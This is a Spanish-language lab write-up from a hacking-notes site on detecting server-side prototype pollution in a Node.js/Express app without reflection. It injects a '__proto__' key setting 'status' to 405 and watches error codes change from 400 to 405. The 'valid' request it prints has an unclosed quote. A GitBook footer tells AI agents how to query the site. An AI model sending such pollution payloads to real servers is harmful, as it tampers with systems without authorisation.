> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web/prototype-pollution/detection-without-reflection-of-modified-properties.md).

# Detección sin reflexión de las propiedades modificadas

### Detección de contaminación de prototipos del lado del servidor sin reflexión de propiedades contaminadas

**Contexto del laboratorio**

Este laboratorio se ejecuta en **Node.js** por **Express**. Es vulnerable a una **contaminación de prototipos del lado del servidor** porque la **aplicación merge (merge) no es segura** a partir de datos controlados por el usuario en un objeto del lado del servidor de JavaScript.

Objetivo: **confirmar la vulnerabilidad** como `Object.prototype` contaminación de prototipos **visible pero no destructiva**, solo mediante un cambio en el comportamiento del servidor (no es necesario explotar más).

Credenciales: `wiener:peter`.

<figure><img src="/files/7f092d55c8adf88a92f952895848055c2f3899d5" alt=""><figcaption></figcaption></figure>

**Datos enviados por la aplicación (dirección)**

Al modificar la dirección de facturación / entrega, el navegador envía un JSON similar a:

```json
{
  "address_line_1": "Wiener HQ",
  "address_line_2": "One Wiener Way",
  "city": "Wienerville",
  "postcode": "BU1 1RP",
  "country": "UK",
  "sessionId": "P72CQIVn4eYngmsyw4efwGYTXt3RSMrU"
}
```

**Genera un error controlado para observar la respuesta**

Si fuerzas un error de análisis de JSON (p. ej., eliminando una comilla), obtienes una respuesta **400** y el servidor devuelve un objeto de error donde el `cuerpo` contiene nuestra carga útil (reflejo):

```json
{
  "address_line_1": "Wiener HQ",
  "address_line_2": "One Wiener Way",
  "city": "Wienerville",
  "postcode": "BU1 1RP",
  "country": "UK",
  "sessionId": "P72CQIVn4eYngmsyw4efwGYTXt3RSMrU
}
```

Respuesta típica:

```json
{
  "error": {
    "expose": true,
    "statusCode": 400,
    "status": 400,
    "body": "{/"address_line_1/":/"Wiener HQ/",/"address_line_2/":/"One Wiener Way/",/"city/":/"Wienerville/",/"postcode/":/"BU1 1RP/",/"country/":/"UK/",/"sessionId/":/"P72CQIVn4eYngmsyw4efwGYTXt3RSMrU/r/n}",
    "type": "entity.parse.failed"
  }
}
```

<figure><img src="/files/d8e4eed2dda528bb6f7a817049812cd92d40e81d" alt=""><figcaption></figcaption></figure>

**Idea: prueba de contaminación sin reflexión directa**

En lugar de esperar a ver una propiedad contaminada devuelta en el cuerpo, se puede apuntar a un **cambio de comportamiento medible**, p. ej., el \*\*código HTTP\*\* devuelto durante un error.

Aquí, el servidor usa (o propaga) campos como `status` / `statusCode`. Si logramos contaminar `Object.prototype.status`, entonces en errores futuros, Express (o el controlador de errores) puede recuperar este valor a través de la herencia del prototipo → el servidor devolverá un **status**.

**Intento de contaminación mediante `__proto__`**

Un `__proto__` la clave se inyecta en el JSON (en una consulta JSON válida, no en una consulta rota), por ejemplo:

```json
{
  "address_line_1": "Wiener HQ",
  "address_line_2": "One Wiener Way",
  "city": "Wienerville",
  "postcode": "BU1 1RP",
  "country": "UK",
  "sessionId": "P72CQIVn4eYngmsyw4efwGYTXt3RSMrU,
  "__proto__": {
    "status": 405
    }
}
```

<figure><img src="/files/45acde46a77a32de0dece313fc8c443dd651ee24" alt=""><figcaption></figcaption></figure>

Efecto esperado: después de esta contaminación, **cualquier error** (p. ej., un error de análisis de JSON provocado voluntariamente) ahora puede responder con **405 en lugar de 400**, porque `status` se hereda de `Object.prototype`.

**Resultado / validación**

* Antes de la contaminación: errores → `400`
* Después de la contaminación: errores → `405` (u otro código elegido)

<figure><img src="/files/ecc9ab1975ccb06ecb806652c2f5a2c2645910dc" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web/prototype-pollution/detection-without-reflection-of-modified-properties.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
